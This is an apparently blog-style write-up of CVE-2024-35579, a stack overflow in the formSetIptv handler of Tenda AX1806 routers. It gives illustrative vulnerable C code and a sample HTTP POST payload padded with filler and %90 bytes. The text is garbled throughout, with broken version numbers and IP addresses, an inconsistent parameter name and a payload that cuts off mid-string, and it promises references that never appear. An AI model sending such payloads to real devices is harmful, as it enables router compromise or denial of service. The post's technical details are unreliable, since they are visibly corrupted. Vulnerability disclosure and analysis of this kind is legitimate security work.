CVE-2024-35579 - Tenda AX1806 v1...1 Stack Overflow Vulnerability Exploit via iptv.city.vlan parameter in formSetIptv function

A new vulnerability named CVE-2024-35579 has been identified in the Tenda AX1806 routers with firmware v1...1. The vulnerability was discovered in the formSetIptv function and affects the iptv.city.vlan parameter. This flaw can lead to a stack overflow, eventually resulting in the execution of arbitrary code or a denial-of-service attack. This post will investigate the exploit details, provide original references, and a code snippet to demonstrate the vulnerability.

Exploit Details

The CVE-2024-35579 vulnerability can be triggered by an attacker who sends a specially crafted HTTP request to the formSetIptv function of a vulnerable Tenda AX1806 router, causing a stack overflow in the iptv.cbVLAN parameter. Attackers can leverage this vulnerability to execute arbitrary code or cause a denial-of-service (DoS) attack on the affected devices.

The root cause of the issue is a lack of proper input validation and an insufficient check on the buffer size. When processing the iptv.city.vlan parameter, the formSetIptv function does not ensure that the user-supplied input data is within the allowable bounds, resulting in a buffer overflow condition.

Below is a code snippet demonstrating the vulnerable part in the firmware

void formSetIptv(request *req, char *post_data)
{
  ...
  char iptv_city_vlan[256];
  ...
  // Get the iptv.city.vlan value submitted by the user
  char *city_vlan = websGetVar(wp, "iptv.city.vlan", "");
  ...
  // Copy the user-supplied data into the stack buffer without checking its size
  strcpy(iptv_city_vlan, city_vlan);
  ...
}

An attacker can exploit this vulnerability by sending an HTTP request with a maliciously crafted iptv.city.vlan value, triggering the stack overflow condition.

Here is an example of a potential exploit payload

`
POST /goform/formSetIptv HTTP/1.1
Host: 192.168..1
User-Agent: Mozilla/5. (Windows NT 10.; Win64; x64; rv:89.) Gecko/20100101 Firefox/89.
Accept: text/html,application/xhtml+xml,application/xml;q=.9,image/webp,*/*;q=.8
Accept-Language: en-US,en;q=.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 297
Origin: http://192.168..1
DNT: 1
Connection: close
Referer: http://192.168..1/iptv.asp
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

iptv.city.vlan=A<...A...128 characters...>AAAAAAAA%00%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%

Timeline

Published on: 05/20/2024 18:15:10 UTC
Last modified on: 08/08/2024 15:35:12 UTC